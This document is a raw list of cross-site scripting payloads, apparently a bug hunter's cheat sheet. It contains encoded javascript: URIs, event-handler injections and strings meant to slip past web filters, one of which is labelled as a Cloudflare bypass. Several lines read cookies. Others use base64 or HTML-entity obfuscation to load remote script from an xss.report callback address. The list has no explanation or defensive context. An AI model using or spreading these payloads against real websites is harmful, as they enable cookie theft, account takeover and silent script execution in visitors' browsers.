javascript:%61lert(1)
javascript:&#37&#54&#49lert(1)
javascript:%26%2337%26%2354%26%2349lert(1)
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> 
javascript:var{a:onerror}={a:alert};throw%20document.domain
<iframe%20src="javascript:alert(document.domain)"></iframe>
%27%3E%3Ca/+/OnMOuSeOvER%0d=%0dconfirm(document.cookie)%3Ev3dm0s
<svg onload=prompt%26%23x000000028;document.domain)>
<svg onload=%0Aalert1>
<svg onload=%0Aalert`1`> '
<svg onload=alert%26%230000000040"1")>
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
"-top['al\x65rt']('sailay')-" 
<a href="https://x.ss<svg/onload=" title=1>alert(1)"
<a href="https://x.ss</script><svg/onload=" title=1>alert(1)"
<iframe/src="data:text/html,<svg onload=alert(1)>">
<IMG SRC="javascript:alert('XSS');">
<img src=x onerror=console.log(alert(1)) <
"/><svg/onload=confirm(/xxs/)>
<h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE
"></script><img src=x onerror=alert(1)> '
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
<animate%20onend=alert(document.cookie)%20attributeName=x%20dur=1s>
//j%5c%5cjavascript%3aalert(document.domain)
'"><script src=//xss.report/s/Hunter313></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL0h1bnRlcjMxMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
javascript:eval('var a=document.createElement(\'script\');a.src=\'//xss.report/s/Hunter313\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL0h1bnRlcjMxMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;xss.report/s/Hunter313&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xss.report/s/Hunter313");a.send();</script>
<script>$.getScript("//xss.report/s/Hunter313")</script>
var a=document.createElement("script");a.src="//xss.report/s/Hunter313";document.body.appendChild(a);

